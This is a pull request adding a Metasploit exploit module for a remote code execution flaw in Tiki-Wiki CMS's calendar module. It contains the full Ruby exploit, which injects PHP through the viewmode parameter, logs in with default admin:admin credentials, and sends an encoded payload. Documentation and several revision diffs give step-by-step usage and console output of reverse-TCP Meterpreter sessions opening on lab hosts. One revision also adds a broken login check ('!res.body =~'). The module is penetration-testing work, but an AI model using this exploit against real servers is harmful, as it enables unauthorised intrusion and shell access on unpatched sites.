### PR TITLE
tiki calendar exec

### DIFF
--- a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
+++ b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
@@ -31,12 +31,13 @@
   4. Do: `set rhost 10.10.10.10`
   5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
   6. Do: `set payload php/bind_perl`
-  7. Do: `check`
-  ```
-    [+] 10.10.10.10:80 The target is vulnerable.
-  ```
-  7. Do: `exploit`
-  8. You should get a shell
+  7. Do: `set verbose true`
+  8. Do: `check`
+```
+  [+] 10.10.10.10:80 The target is vulnerable.
+```
+  8. Do: `exploit`
+  9. You should get a shell
 
 ## Options
 
@@ -46,31 +47,32 @@
 
 ## Scenarios
 
-  Example of running the ID command
-  ```
-    msf > use exploit/linux/http/tiki_calendar_exec
-    msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
-    rhost => 192.168.2.190
-    msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
-    targeturi => /t14_1/
-    msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
-    payload => php/meterpreter/reverse_tcp
-    msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
-    lhost => 192.168.2.229
-    msf exploit(tiki_calendar_exec) > set verbose true
-    verbose => true
-    msf exploit(tiki_calendar_exec) > set username ''
-    username => 
-    msf exploit(tiki_calendar_exec) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.229:4444 
-    [*] Sending malicious calendar view packet
-    [*] Sending stage (33721 bytes) to 192.168.2.190
-    [*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
-    
-    meterpreter > sysinfo
-    Computer    : tikiwiki
-    OS          : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
-    Meterpreter : php/php
-    meterpreter > 
-  ```
+Example running against unauthenticated calendar v14.1
+
+```
+  msf > use exploit/linux/http/tiki_calendar_exec
+  msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
+  rhost => 192.168.2.190
+  msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
+  targeturi => /t14_1/
+  msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
+  payload => php/meterpreter/reverse_tcp
+  msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
+  lhost => 192.168.2.229
+  msf exploit(tiki_calendar_exec) > set verbose true
+  verbose => true
+  msf exploit(tiki_calendar_exec) > set username ''
+  username => 
+  msf exploit(tiki_calendar_exec) > exploit
+  
+  [*] Started reverse TCP handler on 192.168.2.229:4444 
+  [*] Sending malicious calendar view packet
+  [*] Sending stage (33721 bytes) to 192.168.2.190
+  [*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
+  
+  meterpreter > sysinfo
+  Computer    : tikiwiki
+  OS          : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
+  Meterpreter : php/php
+  meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
+++ b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
@@ -35,7 +35,6 @@
   8. Do: `check`
 ```
   [*] Attempting Login
-  [*] Verifying login... Visiting redirect to: http://10.10.10.10/t14_1/tiki-wizard_admin.php?&stepNr=0&url=http%3A%2F%2F192.168.2.190%2Ft14_1%2Ftiki-index.php
   [+] Login Successful!
   [+] 10.10.10.10:80 The target is vulnerable.
 ```
@@ -44,7 +43,6 @@
 ```
   [*] Started reverse TCP handler on 10.10.10.10:4444 
   [*] Attempting Login
-  [*] Verifying login... Visiting redirect to: http://10.10.10.10/t14_1/tiki-wizard_admin.php?&stepNr=0&url=http%3A%2F%2F192.168.2.190%2Ft14_1%2Ftiki-index.php
   [+] Login Successful!
   [*] Sending malicious calendar view packet
   [*] Sending stage (33721 bytes) 10.10.10.10.190

--- a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
+++ b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
@@ -1,0 +1,76 @@
+## Vulnerable Application
+
+  Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
+  Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
+  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+### Creating A Testing Environment
+
+  1. Create a fresh Ubuntu 16.04 w/ a LAMP install
+  2. `apt-get install php-xml`
+  3. Normal php install at that point!
+  4. After install, login as admin:admin
+  5. Go to the Control Panels
+  6. Click Features
+  7. Enable Calendar under Main feature
+  8. Click Apply
+
+#### Permissions
+
+  If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar
+  1. Log in as admin
+  2. From the top dropdown select permissions
+  3. Check Anonymous near the top
+  4. Click Assign
+
+## Verification Steps
+
+  1. Install the software as documented above
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/tiki_calendar_exec`
+  4. Do: `set rhost 10.10.10.10`
+  5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
+  6. Do: `set payload php/bind_perl`
+  7. Do: `check`
+  ```
+    [+] 10.10.10.10:80 The target is vulnerable.
+  ```
+  7. Do: `exploit`
+  8. You should get a shell
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at first login. Default for admin is 'admin'.
+
+## Scenarios
+
+  Example of running the ID command
+  ```
+    msf > use exploit/linux/http/tiki_calendar_exec
+    msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
+    rhost => 192.168.2.190
+    msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
+    targeturi => /t14_1/
+    msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
+    payload => php/meterpreter/reverse_tcp
+    msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
+    lhost => 192.168.2.229
+    msf exploit(tiki_calendar_exec) > set verbose true
+    verbose => true
+    msf exploit(tiki_calendar_exec) > set username ''
+    username => 
+    msf exploit(tiki_calendar_exec) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.229:4444 
+    [*] Sending malicious calendar view packet
+    [*] Sending stage (33721 bytes) to 192.168.2.190
+    [*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
+    
+    meterpreter > sysinfo
+    Computer    : tikiwiki
+    OS          : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
+    Meterpreter : php/php
+    meterpreter > 
+  ```

--- a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
+++ b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
@@ -4,6 +4,18 @@
   Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
   Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
 
+  Of note, there is some discussion if 14.2 is vuln or not.
+```
+  1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
+  2. The linked app Exploit-DB has is 14.2.
+  3. Its verified on Exploit-DB.
+```
+vs
+```
+  1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
+  2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem
+```
+
 ### Creating A Testing Environment
 
   1. Create a fresh Ubuntu 16.04 w/ a LAMP install

--- a/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
+++ b/documentation/modules/exploit/linux/http/tiki_calendar_exec.md
@@ -34,11 +34,22 @@
   7. Do: `set verbose true`
   8. Do: `check`
 ```
+  [*] Attempting Login
+  [*] Verifying login... Visiting redirect to: http://10.10.10.10/t14_1/tiki-wizard_admin.php?&stepNr=0&url=http%3A%2F%2F192.168.2.190%2Ft14_1%2Ftiki-index.php
+  [+] Login Successful!
   [+] 10.10.10.10:80 The target is vulnerable.
 ```
   8. Do: `exploit`
   9. You should get a shell
-
+```
+  [*] Started reverse TCP handler on 10.10.10.10:4444 
+  [*] Attempting Login
+  [*] Verifying login... Visiting redirect to: http://10.10.10.10/t14_1/tiki-wizard_admin.php?&stepNr=0&url=http%3A%2F%2F192.168.2.190%2Ft14_1%2Ftiki-index.php
+  [+] Login Successful!
+  [*] Sending malicious calendar view packet
+  [*] Sending stage (33721 bytes) 10.10.10.10.190
+  [*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
+```
 ## Options
 
   **PASSWORD**

--- a/modules/exploits/linux/http/tiki_calendar_exec.rb
+++ b/modules/exploits/linux/http/tiki_calendar_exec.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name'        => 'Tiki-Wiki CMS Calendar Command Execution',
         'Description' => %q(
-          Tiki-Wiki CMS's calendar module contains a rmeote code execution
+          Tiki-Wiki CMS's calendar module contains a remote code execution
           vulnerability within the viewmode GET parameter.
           The calendar module is NOT enabled by default.  When enbled,
           the default permissions are set to NOT allow anonymous users
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri'       => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
         'method'    => 'GET'
       )
-      cookie = res.get_cookies
+      cookie = res ? res.get_cookies : ''
       # if we have creds, login with them
       vprint_status('Attempting Login')
       res = send_request_cgi(

--- a/modules/exploits/linux/http/tiki_calendar_exec.rb
+++ b/modules/exploits/linux/http/tiki_calendar_exec.rb
@@ -104,55 +104,50 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def check
+  # sends the calendar packet, returns the HTTP response
+  def send_calendar_packet(cookie, data)
     begin
-      if datastore['USERNAME'] && !datastore['USERNAME'].blank?
-        cookie = authenticate
-      end
-      flag = Rex::Text.rand_text_alpha(10)
-      res = send_request_cgi(
+      return send_request_cgi(
         'uri'       => normalize_uri(target_uri.path, 'tiki-calendar.php'),
         'method'    => 'GET',
         'cookie'    => cookie,
         'vars_get'  =>
         {
-          'viewmode'   => "';print(#{flag});$a='"
+          'viewmode'   => "';#{data};$a='"
         }
       )
-      if res
-        if res.body =~ /You do not have permission to view the calendar/
-          fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
-        elsif res.body =~ /#{flag}/
-          Exploit::CheckCode::Vulnerable
-        else
-          Exploit::CheckCode::Safe
-        end
-      end
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end
   end
 
-  def exploit
-    begin
-      if datastore['USERNAME'] && !datastore['USERNAME'].blank?
-        cookie = authenticate
-      end
-      vprint_status('Sending malicious calendar view packet')
-      res = send_request_cgi(
-        'uri'       => normalize_uri(target_uri.path, 'tiki-calendar.php'),
-        'method'    => 'GET',
-        'cookie'    => cookie,
-        'vars_get'  =>
-        {
-          'viewmode'   => "';#{payload.encoded};$a='"
-        }
-      )
-      if res && res.body =~ /You do not have permission to view the calendar/
+  # Version numbers are post auth, so we send a print statement w/
+  # 10 random characters and check for it in the response
+  def check
+    if datastore['USERNAME'] && !datastore['USERNAME'].blank?
+      cookie = authenticate
+    end
+    flag = Rex::Text.rand_text_alpha(10)
+    res = send_calendar_packet(cookie, "print(#{flag})")
+    if res
+      if res.body =~ /You do not have permission to view the calendar/
         fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
+      elsif res.body =~ /#{flag}/
+        Exploit::CheckCode::Vulnerable
+      else
+        Exploit::CheckCode::Safe
       end
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    if datastore['USERNAME'] && !datastore['USERNAME'].blank?
+      cookie = authenticate
+    end
+    vprint_status('Sending malicious calendar view packet')
+    res = send_calendar_packet(cookie, payload.encoded)
+    if res && res.body =~ /You do not have permission to view the calendar/
+      fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
     end
   end
 end

--- a/modules/exploits/linux/http/tiki_calendar_exec.rb
+++ b/modules/exploits/linux/http/tiki_calendar_exec.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           The calendar module is NOT enabled by default.  When enbled,
           the default permissions are set to NOT allow anonymous users
           to access.
-          Vulnerable versions: <=14.2, <=12.5 LTS, <=9.11 LTS and <=6.15
+          Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14
           Verified/Tested against 14.1
         ),
         'Author'      =>
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res
       if res.body =~ /You do not have permission to view the calendar/
         fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
-      elsif res.body =~ /#{flag}/
+      elsif res.body =~ />#{flag}</
         Exploit::CheckCode::Vulnerable
       else
         Exploit::CheckCode::Safe

--- a/modules/exploits/linux/http/tiki_calendar_exec.rb
+++ b/modules/exploits/linux/http/tiki_calendar_exec.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # double check auth worked and we got a Log out on the page.
       # at times I got it to auth, but then it would give permission errors
       # so we want to try to double check everything is good
-      unless res.body =~ /Log out/
+      if res && !res.body =~ /Log out/
         fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
       end
       vprint_good("Login Successful!")

--- a/modules/exploits/linux/http/tiki_calendar_exec.rb
+++ b/modules/exploits/linux/http/tiki_calendar_exec.rb
@@ -1,0 +1,158 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Tiki-Wiki CMS Calendar Command Execution',
+        'Description' => %q(
+          Tiki-Wiki CMS's calendar module contains a rmeote code execution
+          vulnerability within the viewmode GET parameter.
+          The calendar module is NOT enabled by default.  When enbled,
+          the default permissions are set to NOT allow anonymous users
+          to access.
+          Vulnerable versions: <=14.2, <=12.5 LTS, <=9.11 LTS and <=6.15
+          Verified/Tested against 14.1
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@shorebreaksecurity.com>', # module
+            'Dany Ouellet'                          # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39965' ],
+            [ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => %w( php ),
+        'Privileged'     => false,
+        'Arch'           => ARCH_PHP,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Jun 06 2016'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),
+        OptString.new('USERNAME',  [ false, 'Username of a user with calendar access', 'admin']),
+        OptString.new('PASSWORD',  [ false, 'Password of a user with calendar access', 'admin'])
+      ], self.class
+    )
+  end
+
+  # returns cookie regardless of outcome
+  def authenticate
+    begin
+      # get a cookie to start with
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
+        'method'    => 'GET'
+      )
+      cookie = res.get_cookies
+      # if we have creds, login with them
+      vprint_status('Attempting Login')
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'tiki-login.php'),
+        'method'    => 'POST',
+        'ctype'     => 'application/x-www-form-urlencoded',
+        'cookie'    => cookie,
+        'vars_post' =>
+          {
+            'user'                     => datastore['USERNAME'],
+            'pass'                     => datastore['PASSWORD'],
+            'login'                    => '',
+            'stay_in_ssl_mode_present' => 'y',
+            'stay_in_ssl_mode'         => 'n'
+          }
+      )
+      if res && res.redirect? && res.redirection.to_s.end_with?('tiki-login_scr.php')
+        fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      elsif res && res.redirect?
+        vprint_status("Verifying login... Visiting redirect to: #{res.redirection}")
+        res = send_request_cgi(
+          'uri'       => res.redirection.to_s,
+          'method'    => 'GET',
+          'cookie'    => cookie
+        )
+        # double check auth worked and we got a Log out on the page.
+        # at times I got it to auth, but then it would give permission errors
+        # so we want to try to double check everything is good
+        unless res.body =~ /Log out/
+          fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+        end
+      end
+      vprint_good("Login Successful!")
+      return cookie
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def check
+    begin
+      if datastore['USERNAME'] && !datastore['USERNAME'].blank?
+        cookie = authenticate
+      end
+      flag = Rex::Text.rand_text_alpha(10)
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'tiki-calendar.php'),
+        'method'    => 'GET',
+        'cookie'    => cookie,
+        'vars_get'  =>
+        {
+          'viewmode'   => "';print(#{flag});$a='"
+        }
+      )
+      if res
+        if res.body =~ /You do not have permission to view the calendar/
+          fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
+        elsif res.body =~ /#{flag}/
+          Exploit::CheckCode::Vulnerable
+        else
+          Exploit::CheckCode::Safe
+        end
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      if datastore['USERNAME'] && !datastore['USERNAME'].blank?
+        cookie = authenticate
+      end
+      vprint_status('Sending malicious calendar view packet')
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'tiki-calendar.php'),
+        'method'    => 'GET',
+        'cookie'    => cookie,
+        'vars_get'  =>
+        {
+          'viewmode'   => "';#{payload.encoded};$a='"
+        }
+      )
+      if res && res.body =~ /You do not have permission to view the calendar/
+        fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end

--- a/modules/exploits/linux/http/tiki_calendar_exec.rb
+++ b/modules/exploits/linux/http/tiki_calendar_exec.rb
@@ -67,7 +67,8 @@ class MetasploitModule < Msf::Exploit::Remote
       cookie = res ? res.get_cookies : ''
       # if we have creds, login with them
       vprint_status('Attempting Login')
-      res = send_request_cgi(
+      # the bang on the cgi will follow the redirect we receive on a good login
+      res = send_request_cgi!(
         'uri'       => normalize_uri(target_uri.path, 'tiki-login.php'),
         'method'    => 'POST',
         'ctype'     => 'application/x-www-form-urlencoded',
@@ -81,21 +82,11 @@ class MetasploitModule < Msf::Exploit::Remote
             'stay_in_ssl_mode'         => 'n'
           }
       )
-      if res && res.redirect? && res.redirection.to_s.end_with?('tiki-login_scr.php')
+      # double check auth worked and we got a Log out on the page.
+      # at times I got it to auth, but then it would give permission errors
+      # so we want to try to double check everything is good
+      unless res.body =~ /Log out/
         fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
-      elsif res && res.redirect?
-        vprint_status("Verifying login... Visiting redirect to: #{res.redirection}")
-        res = send_request_cgi(
-          'uri'       => res.redirection.to_s,
-          'method'    => 'GET',
-          'cookie'    => cookie
-        )
-        # double check auth worked and we got a Log out on the page.
-        # at times I got it to auth, but then it would give permission errors
-        # so we want to try to double check everything is good
-        unless res.body =~ /Log out/
-          fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
-        end
       end
       vprint_good("Login Successful!")
       return cookie


### PR DESCRIPTION
Adds a module to exploit tiki-wiki CMS command execution in the calendar module. #6982 
## Verification
- [x] Install the software as documented in the doc included in PR (I used 14.1, but 14.2 should work as well)
- [x] Start msfconsole
- [x] Do: `use exploit/linux/http/tiki_calendar_exec`
- [x] Do: `set rhost 10.10.10.10`
- [x] Do: `set PASSWORD admin` (optional, if set to '', set username to '' as well) 
- [x] Do: `set payload php/bind_perl` (or be fancy pants with php/meterpreter/reverse_tcp)
- [x] Do: `set verbose true`
- [x] Do: `check`
- [x] **Verify** the thing does what it should

```
  [+] 10.10.10.10:80 The target is vulnerable.
```
- [x] Do: `exploit`
- [x] You should get a shell
- [x] **Verify** the thing does what it should

```
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Sending malicious calendar view packet
    [*] Sending stage (33721 bytes) to 192.168.2.190
    [*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
```
